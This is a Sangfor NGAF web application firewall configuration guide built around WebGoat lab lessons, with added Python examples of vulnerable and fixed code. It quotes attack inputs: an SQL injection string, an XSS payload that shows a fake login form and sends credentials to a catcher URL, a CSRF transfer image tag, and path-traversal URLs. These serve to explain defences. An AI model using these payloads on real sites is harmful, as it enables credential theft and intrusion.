
NGAF

WAF Configuration Guide

Version 8.0.5
Change Log

Date              Change Description
October 9, 2018   Version 8.0.5 document release.


CONTENT

Chapter 1 Background ....................................................................................................1

1.1 Functionality Introduction ........................................................................................................................1

1.2 Application Scenario.................................................................................................................................1

1.3 Necessary Conditions................................................................................................................................2

Chapter 2 Protection Against Different Types of Attacks ................................................2

2.1 Website-Based Attacks .............................................................................................................................2

2.1.1 SQL Injection.........................................................................................................................2

2.1.2 XSS attack.........................................................................................................................4

2.1.3 Trojan.........................................................................................................................5

2.1.4 Website Scan.........................................................................................................................6

2.1.5 WEBSHELL.........................................................................................................................6

2.1.6 CSRF.........................................................................................................................6

2.1.7 File Inclusion.........................................................................................................................7

2.1.8 Path Traversal.........................................................................................................................7

2.1.9 Information Disclosure.........................................................................................................................8

2.1.10 Web Site Vulnerabilities.........................................................................................................................9

2.1.11 Restrictive URL access.........................................................................................................................9

2.1.12 Parameters.......................................................................................................................10

2.1.13 Application Hiding.......................................................................................................................11

2.1.14 Password.......................................................................................................................12

2.1.15 Privilege.......................................................................................................................14

2.1.16 HTTP.......................................................................................................................16

2.1.17 Data Leak Protection.......................................................................................................................17

Chapter 3 Troubleshooting ...........................................................................................19


NGAF WAF Guide V8.0.5

Chapter 1 Background

1.1 Functionality Introduction


A web application firewall (WAF) is an appliance, server plugin, or filter that applies a
set of rules to an HTTP conversation. Generally, these rules cover common attacks
such as cross-site scripting (XSS) and SQL injection. By customizing the rules to your
application, many attacks can be identified and blocked. The effort to perform this
customization can be significant and needs to be maintained as the application is
modified.
Sangfor Web Application Protection supports gateway/bridge/virtual wire/mirror
mode deployment. It shall be able to provide protection as long as the traffic passes
through the firewall appliance.

1.2 Application Scenario


The firewall is deployed in route mode and the server is placed in the DMZ zone.

W.: www.sangfor.com | W.: community.sangfor.com | E.: tech.support@sangfor.com 1



1.3 Necessary Conditions


Web application protection policies need to be configured properly to ensure proper
protection against any potential attacks.

Chapter 2 Protection Against Different Types of Attacks

2.1 Website-Based Attacks


2.1.1 SQL Injection
Lesson location: Injection Flaws-->String SQL Injection
A normal user enters a name to search for his own information; for example, the input "sangfor"
makes the server execute "SELECT * FROM user_data WHERE last_name = 'sangfor'".

A hacker uses the same field to get more information, for example by entering "sangfor' or '1'='1".
This changes the SQL to "SELECT * FROM user_data WHERE last_name = 'sangfor' or '1'='1'", whose
condition is always true, so every row of the table is returned.
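The lesson's query built both ways, as an added example that is not part of the Sangfor guide: the concatenated form the lesson attacks, and the parameterised form that keeps the quoted input as plain data. The in-memory SQLite table and its rows are constructed here for illustration.

```python
# Added example (not from the Sangfor guide): the lesson's query built two ways,
# run against an in-memory SQLite table constructed here for illustration.
import sqlite3

# Constructed sample data standing in for WebGoat's user_data table.
SAMPLE_ROWS = [("sangfor", "Sangfor"), ("smith", "John"), ("jones", "Mary")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_data (last_name TEXT, first_name TEXT)")
    conn.executemany("INSERT INTO user_data VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn: sqlite3.Connection, last_name: str) -> list:
    # The lesson's bug: the user's text is spliced straight into the SQL,
    # so a quote in the input changes the structure of the query.
    sql = "SELECT * FROM user_data WHERE last_name = '" + last_name + "'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn: sqlite3.Connection, last_name: str) -> list:
    # The fix: the value travels as a bound parameter and is never parsed as
    # SQL, so "sangfor' or '1'='1" is just a last name that matches nobody.
    sql = "SELECT * FROM user_data WHERE last_name = ?"
    return conn.execute(sql, (last_name,)).fetchall()


PAYLOAD = "sangfor' or '1'='1"  # the input quoted in the lesson above

if __name__ == "__main__":
    db = make_db()
    print(search_vulnerable(db, "sangfor"))    # one row
    print(search_vulnerable(db, PAYLOAD))      # every row: the tautology wins
    print(search_parameterized(db, PAYLOAD))   # no rows
```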


2.1.2 XSS attack


Lesson location: Cross-Site Scripting (XSS)-->Phishing with XSS
A normal user enters a search term such as "XSS" into the box, as on Google.

An attacker instead enters HTML and script into the box, such as:
"</form><script>function hack(){ XSSImage=new Image;
XSSImage.src="http://192.200.19.86:8080/webgoat/catcher?PROPERTY=yes&user="
+document.phish.user.value + "&password=" + document.phish.pass.value +
"";alert("Had this been a real attack... Your credentials were just stolen. User Name
= " + document.phish.user.value + " Password = " + document.phish.pass.value);}
</script><form name="phish"><br><br><HR><H3>This feature requires account
login:</H2><br><br>Enter Username:<br><input type="text"
name="user"><br>Enter Password:<br><input type="password" name =
"pass"><br><input type="submit" name="login" value="login"
onclick="hack()"></form><br><br><HR>
"


The injected code runs in the result page and shows a fake login form to other users. When
another user enters his username and password into it, the credentials are sent to the hacker's URL
"http://192.200.19.86:8080/webgoat/catcher?PROPERTY=yes&user=".

Sangfor WAF denies the HTML and script and records the event as follows:
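The two layers that stop the phishing form above, as an added example that is not part of the Sangfor guide: a WAF-style check that refuses HTML tags in a search parameter, and the output encoding the application itself should apply so that an echoed search term is displayed rather than parsed. The payload fragment is constructed from the lesson text.

```python
# Added example (not from the Sangfor guide): a front-line tag check like the
# WAF's, beside the output encoding that makes the echoed term harmless anyway.
import html
import re

# Constructed fragment of the lesson payload: enough to close the real form,
# run a script and open the fake login form.
PHISH_PAYLOAD = (
    '</form><script>function hack(){alert("stolen")}</script>'
    '<form name="phish">Enter Username:<input type="text" name="user">'
    '<input type="submit" value="login" onclick="hack()"></form>'
)

# An opening or closing tag: "<", optional "/", then a tag name. This is the
# kind of pattern a WAF signature matches; it is a detection layer, not the fix.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][a-zA-Z0-9]*")


def waf_denies(param_value: str) -> bool:
    return TAG_RE.search(param_value) is not None


def render_vulnerable(query: str) -> str:
    # The lesson's bug: the search term is echoed into the page as raw HTML,
    # so the attacker's tags become part of the document other users see.
    return "<p>Results for: " + query + "</p>"


def render_encoded(query: str) -> str:
    # The fix: encode <, >, &, " and ' so the term is shown, never parsed.
    return "<p>Results for: " + html.escape(query, quote=True) + "</p>"


def echoes_tags(rendered: str) -> bool:
    # True when the payload's script or fake form survived into the page.
    return "<script>" in rendered or '<form name="phish">' in rendered


if __name__ == "__main__":
    print(waf_denies("XSS"), waf_denies(PHISH_PAYLOAD))          # False True
    print(echoes_tags(render_vulnerable(PHISH_PAYLOAD)))         # True
    print(echoes_tags(render_encoded(PHISH_PAYLOAD)))            # False
```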

2.1.3 Trojan


A Trojan horse here is a program designed by an attacker to be downloaded automatically
through an HTML page. The attacker crafts the HTML page and writes malicious code or script
that takes advantage of vulnerabilities in the web browser, making the browser download and
execute the Trojan automatically when a user visits that page.

2.1.4 Website Scan


Before an attack, a hacker usually uses tools to scan the whole website; from the scan results
the hacker learns information that helps the attack.
Sangfor WAF can deny scans by matching the WAF signature database and by counting attempts.

2.1.5 WEBSHELL
In some scenarios a website needs to let users upload files. A hacker can upload a webshell,
then use another tool to access the webshell and control the whole website.
In the lesson, the hacker uploads a JSP webshell, then visits it and controls the website.

2.1.6 CSRF
CSRF (cross-site request forgery) is a type of malicious exploit of a website in which
unauthorized commands are transmitted from a user that the website trusts.
For example:
User A is visiting his online bank http://www.bank.com.
Hacker B sends A a mail that contains a picture:
<img src="http://www.bank.com/transfer.php?accound=B&amount=1000"/>
When A reads the mail and clicks the picture, A's browser requests the URL
"http://www.bank.com/transfer.php?accound=B&amount=1000"
and 1000 is transferred to B.
Sangfor WAF can deny this attack using the HTTP Referer header field.
In the following configuration, http://www.bank.com/transfer.php may only be
visited from http://www.bank.com.
So even if user A clicks the picture and requests the transfer page, the traffic is
denied, because the request does not come from http://www.bank.com.
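The Referer rule described above as a small request check, added here as an example that is not part of the Sangfor guide. It compares the whole scheme and host of the Referer (or Origin, when a browser sends it) against the bank's origin; the rule that a request with neither header is denied is an assumption of this example, and the webmail and lookalike hosts are constructed.

```python
# Added example (not from the Sangfor guide): the Referer check the guide
# configures for transfer.php, as a function over one request's headers.
from urllib.parse import urlsplit

PROTECTED_PATHS = ("/transfer.php",)     # pages that must be reached from the site itself
ALLOWED_ORIGIN = "http://www.bank.com"   # the only origin allowed to send them


def same_origin(url: str, origin: str) -> bool:
    # Compare scheme and full host, so www.bank.com.evil.example does not pass.
    a, b = urlsplit(url), urlsplit(origin)
    return (a.scheme, a.netloc) == (b.scheme, b.netloc)


def csrf_check(path: str, headers: dict) -> str:
    """Return 'allow' or 'deny' for one request, using only its headers.

    Browsers send Origin on cross-site form posts and Referer on most
    navigations; Origin is preferred when present. A request carrying
    neither header is denied because its source cannot be verified
    (assumption of this example; the guide only states that a wrong
    Referer is denied).
    """
    if path not in PROTECTED_PATHS:
        return "allow"
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return "deny"
    return "allow" if same_origin(source, ALLOWED_ORIGIN) else "deny"


# Constructed requests: the bank's own page, the mailed picture opened in a
# hypothetical webmail host, and a hypothetical lookalike host.
LEGIT = {"Referer": "http://www.bank.com/account.html"}
FROM_MAIL = {"Referer": "http://mail.example/inbox"}
LOOKALIKE = {"Referer": "http://www.bank.com.evil.example/x"}

if __name__ == "__main__":
    print(csrf_check("/transfer.php", LEGIT))      # allow
    print(csrf_check("/transfer.php", FROM_MAIL))  # deny
    print(csrf_check("/transfer.php", LOOKALIKE))  # deny
    print(csrf_check("/index.html", FROM_MAIL))    # allow: not a protected page
```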


2.1.7 File Inclusion


File inclusion is a type of attack specific to PHP websites. If PHP variable filtering is not
strict and a parameter is not checked for whether it points to a local or a remote file, an
attacker can supply a remote file through that variable and have it executed. If the submitted
file contains malicious code or is a PHP Trojan, it is executed with the web server's privileges.
Below is an example of the rule found in the WAF (Web Application Firewall) database.
Sangfor WAF will deny the following attack.

2.1.8 Path Traversal


Hackers can try to reach any directory of the website and execute dangerous actions by path
traversal, such as:
http://sangfor.com/show.asp?view=../../../../../Windows/system.ini
http://sangfor.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\


We can test this in our lab environment:

http://192.200.19.86:8080/webgoat/attack?Screen=138&menu=200&show=Params/../../../webgoat/lessons/RoleBasedAccessControl/images/accessControl.jpg
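The normalisation a WAF or server has to perform before it can judge the URLs above, as an added example that is not part of the Sangfor guide: percent-decoding is repeated so `%5c` and double-encoded forms resolve, backslashes are treated as separators, and both the path and every query value are walked segment by segment to see whether `..` ever climbs above the starting directory. The benign URL is constructed for contrast.

```python
# Added example (not from the Sangfor guide): the normalisation a WAF or server
# must do before judging whether a request path still points inside the web root.
from urllib.parse import unquote, urlsplit


def decode_fully(text: str, rounds: int = 3) -> str:
    # Decode repeatedly so double encoding (%255c -> %5c -> \) cannot hide a separator.
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def climbs_above_root(text: str) -> bool:
    # Walk the segments; the moment ".." would step above the starting directory,
    # the value has escaped. Backslashes count as separators, as on Windows hosts.
    depth = 0
    for seg in text.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def escapes_web_root(url: str) -> bool:
    """True when the URL path or any query value traverses above its base."""
    parts = urlsplit(url)
    # Query values are checked too: show.asp?view=../.. is the guide's first case.
    values = [kv.split("=", 1)[1] for kv in parts.query.split("&") if "=" in kv]
    return any(climbs_above_root(decode_fully(c)) for c in [parts.path] + values)


# The three URLs quoted in the guide, plus one constructed benign request.
GUIDE_URLS = [
    "http://sangfor.com/show.asp?view=../../../../../Windows/system.ini",
    "http://sangfor.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\\",
    "http://192.200.19.86:8080/webgoat/attack?Screen=138&menu=200&show=Params/"
    "../../../webgoat/lessons/RoleBasedAccessControl/images/accessControl.jpg",
]
BENIGN_URL = "http://sangfor.com/main/index.html?page=docs/intro.html"

if __name__ == "__main__":
    for u in GUIDE_URLS + [BENIGN_URL]:
        print(escapes_web_root(u), u)
```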

2.1.9 Information Disclosure


Some pages in the website may fail to open and return many errors; these errors can tell a
hacker a lot of information that can then be used to attack the server.
"http://192.200.19.86:8080/webgoat/uploads/in.jsp" is an error page.
Before the WAF is enabled it shows a lot of information.

Nothing is shown once WAF protection is enabled.


2.1.10 Web Site Vulnerabilities


Sometimes the system or program is not updated in time and has vulnerabilities; hackers may
use scanners to find these vulnerabilities and then use them to attack the website.
Sangfor WAF denies traffic that matches the WAF signature database.

2.1.11 Restrictive URL access


The website administrator can use this function to set which directories or pages users may visit.
For example, http://www.sangfor.com/manage/xxxx is for the administrator to manage the
website, and http://www.sangfor.com/main/xxx is for users to visit.
We can configure it as follows to allow users to visit only http://www.sangfor.com/main/xxx.

2.1.12 Parameters
This is a very intelligent function: NGAF WAF learns from users' data.
For example, if 95% of users post only letters and numbers to the server, but someone then
posts other special characters, WAF treats it as an abnormal action; the administrator can set
the action to deny or to log the event.
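A minimal version of that learning, added here as an example that is not part of the Sangfor guide or NGAF's implementation: the profile records which character classes each parameter's values normally contain, and a value using a class seen in fewer than 5% of learned values (the complement of the 95% above) is flagged as abnormal. The training values are constructed.

```python
# Added example (not from the Sangfor guide): learn which character classes a
# parameter normally carries, then flag values that use a class rarely seen.
from collections import Counter, defaultdict
import unicodedata


def char_class(ch: str) -> str:
    if ch.isalpha():
        return "letter"
    if ch.isdigit():
        return "digit"
    if ch.isspace():
        return "space"
    if unicodedata.category(ch).startswith("P"):
        return "punct"
    return "other"   # symbols such as = < >, control characters, and so on


class ParameterProfile:
    """Learns, per parameter name, which character classes its values use."""

    def __init__(self, min_share: float = 0.05):
        self.min_share = min_share          # a class below this share is not "normal"
        self.seen = defaultdict(Counter)    # name -> class -> values that used it
        self.count = Counter()              # name -> values learned

    def learn(self, name: str, value: str) -> None:
        self.count[name] += 1
        for cls in {char_class(c) for c in value}:
            self.seen[name][cls] += 1

    def is_abnormal(self, name: str, value: str) -> bool:
        total = self.count[name]
        if total == 0:
            return False   # nothing learned yet: keep learning, do not block
        for cls in {char_class(c) for c in value}:
            if self.seen[name][cls] / total < self.min_share:
                return True
        return False


# Constructed training data: what ordinary users send to a "username" field.
TRAINING = ["sangfor", "alice01", "bob 2018", "carol", "dave99"] * 4

if __name__ == "__main__":
    profile = ParameterProfile()
    for v in TRAINING:
        profile.learn("username", v)
    print(profile.is_abnormal("username", "eve2019"))              # False
    print(profile.is_abnormal("username", "sangfor' or '1'='1"))   # True
```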


2.1.13 Application Hiding


FTP
Before enabling FTP application hiding

After enabling FTP application hiding

HTTP
http://192.200.19.86:8080/webgoat/uploads/1.jsp is an unavailable URL, but a hacker can try
to get information from the server response.
Before enabling Sangfor WAF, we can see that this website does not have the file 1.jsp and
that the website runs on Apache Tomcat/7.0.27.


After enabling Sangfor WAF, we get nothing from the server response.

2.1.14 Password


Sangfor WAF can detect whether FTP/HTTP passwords are weak or strong, and can inspect
web-access cleartext requests.
Even if a user logs in to FTP/HTTP with a weak password, WAF will not deny the traffic, but
this can be used together with defense against brute-force attacks.

HTTP defense against brute-force attack lesson location:
Improper Error Handling-->Fail Open Authentication Scheme


2.1.15 Privilege


In this function, the administrator can define which files can be uploaded to the server,
because a hacker may use the upload function to upload a webshell or Trojan.
File upload is restricted by file type; if a hacker uploads a webshell or Trojan with a disguised
file type, the traffic is denied by the webshell or Trojan rules.
Lesson location: Malicious Execution-->Malicious File Execution


The administrator can configure URL access rights, defining which URLs are allowed or denied.
If a URL is allowed in this function, the traffic is allowed even if a hacker attacks that URL.


2.1.16 HTTP
The administrator can allow only certain HTTP request methods, preventing attacks that use
other methods.

For the test, we do not allow the POST method and then send a POST request; Sangfor WAF
denies the traffic and records it as follows.


2.1.17 Data Leak Protection


Sensitive Data Protection
The administrator can use this function to protect sensitive data such as staff
salaries, emails, MD5 hashes and phone numbers.
If one page contains a keyword too many times, Sangfor WAF can deny the traffic. The
following rule can be customized as shown in the snapshots below.


File Download Restriction

Sangfor WAF can define which files may be downloaded, for example denying downloads of
.bak/.sql/.mdb/... files.
For this test, we set it to deny files with the .jpg extension.
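The three allow/deny rules the guide configures in 2.1.11 (restrictive URL access), 2.1.16 (HTTP request methods) and the file download restriction just above, expressed as one per-request policy. This is an added example, not the guide's or NGAF's own code; it assumes the request path has already been normalised, and the paths and rule values are constructed.

```python
# Added example (not from the Sangfor guide): the URL-prefix, HTTP-method and
# download-extension rules evaluated as one policy, first matching rule wins.
# Paths are assumed to be already normalised (no "..", no encoding left).
from dataclasses import dataclass, field
import posixpath


@dataclass
class WafPolicy:
    allowed_methods: set = field(default_factory=lambda: {"GET", "HEAD"})
    allowed_prefixes: tuple = ("/main/",)   # 2.1.11: users may only visit here
    denied_extensions: set = field(default_factory=lambda: {".bak", ".sql", ".mdb"})

    def evaluate(self, method: str, path: str) -> tuple:
        """Return (action, reason) for one request."""
        if method.upper() not in self.allowed_methods:
            return ("deny", "method not allowed")
        if not any(path.startswith(p) for p in self.allowed_prefixes):
            return ("deny", "URL outside allowed directories")
        ext = posixpath.splitext(path)[1].lower()
        if ext in self.denied_extensions:
            return ("deny", "download of " + ext + " files is restricted")
        return ("allow", "")


# Constructed requests reproducing the guide's tests: a POST when only GET and
# HEAD are allowed, a visit to /manage/, and a download of a restricted type.
TESTS = [
    ("GET", "/main/index.html"),
    ("POST", "/main/login.jsp"),
    ("GET", "/manage/users.jsp"),
    ("GET", "/main/backup/site.bak"),
    ("GET", "/main/photo.jpg"),
]

if __name__ == "__main__":
    policy = WafPolicy()
    for m, p in TESTS:
        print(m, p, policy.evaluate(m, p))
    jpg_policy = WafPolicy(denied_extensions={".jpg"})   # the guide's .jpg test
    print(jpg_policy.evaluate("GET", "/main/photo.jpg"))  # ('deny', ...)
```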


Chapter 3 Troubleshooting
NGAF Unable To Deny/Locate Attack

1) Make sure the traffic has passed through the NGAF. Especially when the NGAF is deployed
in mirror mode, a mirror port must be configured and the traffic directed to the NGAF.
2) Check the configuration:
Destination IP must be the server's real private IP, not the public NAT IP.
Port must be the server's service port.
3) Make sure the database is updated to the latest version.
4) Make sure the option to send a TCP reset message to reject the request is checked;
otherwise NGAF cannot deny the attack.


5) Check the log and note whether the action is allow or deny; if this is a real attack, you
can change the database action based on the rule ID.
6) Check the global exclusion IP list and ensure the troubleshooting option is disabled,
otherwise it will bypass the listed IPs.
